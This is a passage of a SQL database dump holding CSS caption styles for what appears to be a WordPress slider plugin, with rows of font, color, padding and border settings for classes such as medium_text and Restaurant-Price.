0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"14px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(3,'.tp-caption.medium_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(4,'.tp-caption.large_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(5,'.tp-caption.very_large_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\",\"letter-spacing\":\"-2px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(6,'.tp-caption.very_big_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\",\"padding-top\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"padding\":\"0px 4px\",\"background-color\":\"#000\"}'),(7,'.tp-caption.very_big_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\",\"padding-top\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#000\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"padding\":\"0px 4px\",\"background-color\":\"#fff\"}'),(8,'.tp-caption.modern_medium_fat','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#000\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(9,'.tp-caption.modern_medium_fat_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(10,'.tp-caption.modern_medium_light','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#000\",\"font-weight\":\"300\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(11,'.tp-caption.modern_big_bluebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"letter-spacing\":\"0\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#4e5b6c\"}'),(12,'.tp-caption.modern_big_redbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"padding-top\":\"1px\",\"letter-spacing\":\"0\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#de543e\"}'),(13,'.tp-caption.modern_small_text_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#555\",\"font-size\":\"14px\",\"line-height\":\"22px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(14,'.tp-caption.boxshadow','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"-moz-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"-webkit-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\"},\"hover\":\"\"}','[]'),(15,'.tp-caption.black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#000\"}'),(16,'.tp-caption.noshadow','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','[]'),(17,'.tp-caption.thinheadline_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"rgba(0,0,0,0.85)\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),(18,'.tp-caption.thintext_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"rgba(0,0,0,0.85)\",\"font-weight\":\"300\",\"font-size\":\"16px\",\"line-height\":\"26px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),(19,'.tp-caption.largeblackbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#000\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),(20,'.tp-caption.largepinkbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#db4360\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),(21,'.tp-caption.largewhitebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}','{\"color\":\"#000\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#fff\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),(22,'.tp-caption.largegreenbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#67ae73\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),(23,'.tp-caption.excerpt','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\",\"letter-spacing\":\"-1.5px\",\"width\":\"150px\",\"white-space\":\"normal !important\",\"height\":\"auto\"},\"hover\":\"\"}','{\"font-size\":\"36px\",\"line-height\":\"36px\",\"font-weight\":\"700\",\"font-family\":\"Arial\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"rgba(0, 0, 0, 1)\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px 4px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 255, 255)\",\"border-style\":\"none\"}'),(24,'.tp-caption.large_bold_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(25,'.tp-caption.medium_thin_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-size\":\"34px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(26,'.tp-caption.small_thin_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-size\":\"18px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(117, 117, 117)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(27,'.tp-caption.lightgrey_divider','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"width\":\"370px\",\"height\":\"3px\",\"background-position\":\"initial initial\",\"background-repeat\":\"initial initial\"},\"hover\":\"\"}','{\"text-decoration\":\"none\",\"background-color\":\"rgba(235, 235, 235, 1)\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(28,'.tp-caption.large_bold_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(29,'.tp-caption.medium_bg_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(52, 73, 94)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(30,'.tp-caption.medium_bold_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(31,'.tp-caption.medium_light_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"21px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(32,'.tp-caption.medium_bg_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(227, 58, 12)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(33,'.tp-caption.medium_bold_orange','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(243, 156, 18)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(34,'.tp-caption.medium_bg_orange','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(243, 156, 18)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(35,'.tp-caption.grassfloor','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"width\":\"4000px\",\"height\":\"150px\"},\"hover\":\"\"}','{\"text-decoration\":\"none\",\"background-color\":\"rgba(160, 179, 151, 1)\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(36,'.tp-caption.large_bold_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(37,'.tp-caption.medium_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(38,'.tp-caption.mediumlarge_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(39,'.tp-caption.mediumlarge_light_white_center','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px 0px 0px 0px\",\"text-align\":\"center\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(40,'.tp-caption.medium_bg_asbestos','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(127, 140, 141)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(41,'.tp-caption.medium_light_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(42,'.tp-caption.large_bold_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(43,'.tp-caption.mediumlarge_light_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(44,'.tp-caption.small_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"17px\",\"line-height\":\"28px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(45,'.tp-caption.roundedimage','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(46,'.tp-caption.large_bg_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(0, 0, 0)\",\"padding\":\"10px 20px 15px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(47,'.tp-caption.mediumwhitebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(255, 255, 255)\",\"padding\":\"5px 15px 10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(0, 0, 0)\",\"border-style\":\"none\"}'),(48,'.tp-caption.MarkerDisplay','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ff0000\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-style\":\"normal\",\"font-family\":\"Permanent Marker\",\"padding\":\"0px 0px 0px 0px\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(49,'.tp-caption.Restaurant-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"120px\",\"line-height\":\"120px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(50,'.tp-caption.Restaurant-Cursive','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Nothing you could do\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(51,'.tp-caption.Restaurant-ScrollDownText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(52,'.tp-caption.Restaurant-Description','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(53,'.tp-caption.Restaurant-Price','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d